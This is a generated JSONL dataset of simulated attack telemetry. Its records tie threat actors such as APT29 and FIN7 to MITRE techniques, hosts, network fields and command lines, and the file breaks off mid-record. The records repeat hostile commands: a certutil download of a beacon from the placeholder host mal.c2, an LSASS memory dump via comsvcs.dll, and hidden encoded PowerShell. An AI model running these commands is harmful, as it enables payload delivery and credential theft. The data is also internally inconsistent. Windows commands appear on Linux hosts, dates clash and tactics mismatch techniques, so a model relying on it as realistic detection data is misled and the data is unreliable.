{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20261226T153714000Z_0004695","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.132.15.210","name":"APP-WEB-EJQEQ1EMF2","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4695Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.139.21.2","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-04T18:35:54.000Z","user":{"name":"i-uc58felmviaj","sid":"S-1-5-21-129282525-725399593-3436"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Reconnaissance","Execution"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20261203T113750000Z_0004697","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.174.15.215","name":"EC2-INST-BFUH17A8X0","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4697Mustang PandaT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.97.29.166","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-10-04T11:11:46.000Z","user":{"name":"svc_zzymzsj3yt73","sid":"S-1-5-21-344214048-980937576-8597"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20250221T215615000Z_0004699","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.249.217.69","name":"EC2-INST-66HTUPN3ST","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4699APT29T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.84.200.158","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-29T15:03:54.000Z","user":{"name":"azuread\\id23t7uxgx93","sid":"S-1-5-21-805503164-720906369-3362"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Collection"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20250730T164834000Z_0004701","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.159.206.130","name":"WIN-FIN-SRV-OUG9HJET6B","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4701UNC4841T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.173.216.105","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-05T19:01:22.000Z","user":{"name":"CORP\\5p68dtwsngn9","sid":"S-1-5-21-847408917-299228928-4675"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Credential Access"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260729T162043000Z_0004703","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.16.56.76","name":"IAM-ROLE-YGCF6WFSEF","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4703Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.110.231.92","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3911 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-11T07:56:40.000Z","user":{"name":"i-2xui5mthhqh6","sid":"S-1-5-21-419295329-625962506-9867"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250903T152859000Z_0004705","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.176.193.229","name":"DB-ORACLE-ZJYPB87EBB","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4705FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.83.240.54","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-11-14T13:06:19.000Z","user":{"name":"arn:aws:iam::fglbgdyssq5x","sid":"S-1-5-21-840300374-136646986-1677"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20261107T212559000Z_0004707","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.98.160.12","name":"AZURE-VM-B5TWB8G3ZH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4707APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.4.161.56","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3182 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-10-31T20:02:43.000Z","user":{"name":"CORP\\3ljm01wt1xfg","sid":"S-1-5-21-145208422-773129218-6180"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20261125T144556000Z_0004709","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.148.205.127","name":"IAM-ROLE-TQV2UZGLMV","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4709APT41T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.104.119.99","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-09T16:09:35.000Z","user":{"name":"azuread\\kh66ueqq4b01","sid":"S-1-5-21-751664411-812907187-5020"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Lateral Movement","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250322T221644000Z_0004711","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.81.54.32","name":"AZURE-VM-IPUFSNRC6R","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4711FIN7T1003.001"},"network":{"domain":"github.com","dst_ip":"1.91.27.171","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 937 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-20T20:35:23.000Z","user":{"name":"CORP\\f07mpyhktmz1","sid":"S-1-5-21-758222542-329082995-5759"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Credential Access","Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20261111T063624000Z_0004713","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.128.4.154","name":"AZURE-VM-0AX89TI9ZS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4713Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.104.251.194","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-14T10:02:44.000Z","user":{"name":"arn:aws:iam::l4y6ok49lol0","sid":"S-1-5-21-457661881-942794062-9467"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Execution","Exfiltration","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20251220T173402000Z_0004715","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.25.40.50","name":"IAM-ROLE-VOK9UT7B7Q","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4715APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.134.98.155","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3380 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-26T06:25:46.000Z","user":{"name":"i-ecojff04hl16","sid":"S-1-5-21-381191194-430832112-6766"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Execution"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260517T162849000Z_0004717","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.204.92.209","name":"EC2-INST-R50RIXAVMI","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4717Lapsus$T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.119.91.171","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 538 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-23T23:50:24.000Z","user":{"name":"arn:aws:iam::lh1q82v9zgid","sid":"S-1-5-21-443896979-531010387-2252"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Defense Evasion","Collection"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260427T164611000Z_0004719","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.135.117.75","name":"EC2-INST-14SZGV7DDJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4719Volt TyphoonT1546.003"},"network":{"domain":"github.com","dst_ip":"1.190.134.147","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-09T07:43:06.000Z","user":{"name":"i-io7ov8xuhm2l","sid":"S-1-5-21-615848404-383909998-6731"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Discovery","Execution"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20250614T073815000Z_0004721","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.130.215.243","name":"DB-ORACLE-GRSROG6OS4","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4721Scattered SpiderT1003.001"},"network":{"domain":"github.com","dst_ip":"1.94.186.7","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-01-18T12:22:54.000Z","user":{"name":"svc_bbpwz8m15emt","sid":"S-1-5-21-930256571-340816162-7665"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250424T085219000Z_0004723","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.36.16.153","name":"IAM-ROLE-48SFN1S28I","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4723APT41T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.10.25.139","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-23T22:11:03.000Z","user":{"name":"CORP\\bjzy3yxm3x46","sid":"S-1-5-21-322999499-111902544-1709"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Lateral Movement","Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250209T103547000Z_0004725","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.129.224.149","name":"IAM-ROLE-DW20ZOWY1D","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4725Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.35.161.19","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-02-18T01:02:34.000Z","user":{"name":"azuread\\c5f58bneyb21","sid":"S-1-5-21-310982278-981022066-2742"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250129T140845000Z_0004727","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.156.38.159","name":"WIN-FIN-SRV-1ZF8KRSVZX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4727Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.139.76.199","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1464 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-03T05:43:22.000Z","user":{"name":"CORP\\644qyaih3ilv","sid":"S-1-5-21-119702596-314766822-8355"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Collection"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260626T062602000Z_0004729","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.227.179.114","name":"DB-ORACLE-VV0NUNUXX3","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4729Scattered SpiderT1484.001"},"network":{"domain":"github.com","dst_ip":"1.149.196.125","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1938 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-23T18:57:27.000Z","user":{"name":"azuread\\9uw2d6coxx3a","sid":"S-1-5-21-323163767-681160248-6391"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260325T025436000Z_0004731","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.24.161.206","name":"EC2-INST-7FCE01IGM7","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4731Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.115.72.166","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-23T00:54:06.000Z","user":{"name":"i-yx4n90gaqp3w","sid":"S-1-5-21-630670152-746093626-5377"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Discovery","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250813T123918000Z_0004733","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.215.105.19","name":"EC2-INST-XA7ZNG23UH","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4733Mustang PandaT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.38.235.95","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2715 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-14T20:16:21.000Z","user":{"name":"svc_h2ye2im54p36","sid":"S-1-5-21-661007459-690893289-3619"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Privilege Escalation","Persistence"],"technique_id":"T1570"},"event_id":"evt_fin7_20260214T185338000Z_0004735","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.236.72.188","name":"DB-ORACLE-TDWGYNFLOE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4735FIN7T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.16.182.61","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-30T09:40:34.000Z","user":{"name":"i-60ba7ves6d26","sid":"S-1-5-21-167279701-824314413-1478"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Persistence"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20261012T191153000Z_0004737","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.150.149.98","name":"EC2-INST-WRFEILQPK9","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4737Lapsus$T1021.006"},"network":{"domain":"github.com","dst_ip":"1.19.61.1","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-16T19:13:19.000Z","user":{"name":"azuread\\aecc5ysik1k0","sid":"S-1-5-21-302649320-248496944-2150"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20261213T211839000Z_0004739","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.244.188.168","name":"EC2-INST-CHIV6Z30H0","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4739UNC4841T1003.001"},"network":{"domain":"github.com","dst_ip":"1.131.180.229","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-13T14:15:54.000Z","user":{"name":"i-7qfdefr1h0lv","sid":"S-1-5-21-416944165-795327883-9201"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Persistence"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20261019T205242000Z_0004741","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.207.126.250","name":"DB-ORACLE-VOO4D3WG6M","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4741APT41T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.175.196.244","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging 